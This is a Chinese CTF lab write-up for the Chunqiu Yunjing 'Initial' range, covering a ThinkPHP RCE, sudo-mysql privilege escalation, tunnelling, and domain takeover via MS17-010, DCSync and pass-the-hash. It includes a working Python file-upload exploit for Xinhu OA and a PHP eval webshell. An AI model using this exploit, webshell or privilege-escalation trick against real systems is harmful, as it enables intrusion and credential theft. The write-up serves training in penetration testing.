文章总结： 本文记录了春秋云境Initial挑战的解题过程。首先通过ThinkPHPRCE漏洞获取Webshell，利用MySQL提权获得root权限读取flag1。随后使用fscan扫描内网，发现信呼OA系统，利用文件上传漏洞和弱口令获取flag2。最后利用MS17-010漏洞横向移动，通过DCSync攻击获取域管哈希，结合PtH技术拿下域控权限获取flag3。内容涵盖端口扫描、漏洞利用、隧道搭建及域渗透技巧。 综合评分： 88 文章分类： CTF,内网渗透,渗透测试,WEB安全,红队

春秋云境Initial wp

OOO OOO

船山信安

2026年2月15日 19:14 福建

flag1

image-20260215131004497

这里进来是一个登录的页面，但其实它不能登录，于是使用Tscan进行端口扫描

发现web服务是用ThinkPHP搭建的（从网站图标也能知道）

image-20260215131815801

接下来就是使用ThinkPHP漏洞检测工具（工具地址：https://github.com/AgonySec/ThinkPHPGUI）

image-20260215132133564

存在RCE漏洞，直接getshell，然后使用蚁剑连接

image-20260215132552052

使用蚁剑的虚拟终端，但是当前用户是www-data，尝试过后发现权限低（无权限读取/root），必须得提权

image-20260215133617897

使用sudo -l枚举，结果发现sudo可以无密码运行/usr/bin/mysql

在root目录下发现了flag目录

image-20260215134530643

获得第一个flag！

image-20260215135119475

注意：在mysql的 -e 参数中直接运行Shell命令时，必须使用\!（反斜杠 + 感叹号）来告诉MySQL这不是SQL语句，而是一个系统命令。

flag01：flag{60b53231-

flag2

使用蚁剑的虚拟终端上传fscan，并使用ifconfig查看当前ip

image-20260215140343017

image-20260215140747166

使用fscan扫描，扫描发现主机172.22.1.18开放了 Web 服务，指纹显示为“信呼协同办公系统”，为进一步攻击，使用Venom搭建隧道

image-20260215141206515

在服务器1080 端口开启 SOCKS5 代理

成功在本机上访问办公系统

image-20260215145044771

存在弱口令admin/admin123，网络上搜索发现存在文件上传漏洞，使用公开的POC对其进行攻击

import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)

在同目录下放一个1.php

<?=eval($_POST['cmd']);?>

使用蚁剑连接（蚁剑也需要配代理）

image-20260215155848547

注意：进行文件读取，由于是windows系统，读取文件命令用type

image-20250820164933238

flag02：2ce3-4813-87d4-

flag3

image-20260215160844678

回看一下fscan的结果，172.22.1.21 Windows的机器并且存在MS17-010漏洞，现在就开始打永恒之蓝，使用MSF+Venom代理隧道，成功

image-20260215183211871

接下来执行load kiwi（加载密码抓取插件）和creds_all（抓取域管理员 administrator 的明文密码），但是失败只有机器账号

image-20260215183416146

尝试 DCSync 攻击（在不直接登录域控的情况下，远程导出域内所有账号的密码哈希），获得了admin的哈希

image-20260215184323746

然后采用 Pass-the-Hash (PtH) 技术，绕过明文密码破解阶段，通过 psexec 模块成功在域控 172.22.1.2 上建立会话。

image-20260215184946418

由于 Meterpreter 交互环境与 Windows 原生 Cmd 环境存在命令差异，通过执行 shell 命令切换至目标主机系统命令行，通过 dir /s /b C:\flag* 命令进行全盘递归搜索，最终定位到 flag03 的确切物理路径。

image-20260215185203171

成功拿下第三个flag

flag03：e8f88d0d43d6}

附上攻克截图

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：船山信安 OOO OOO《春秋云境Initial wp》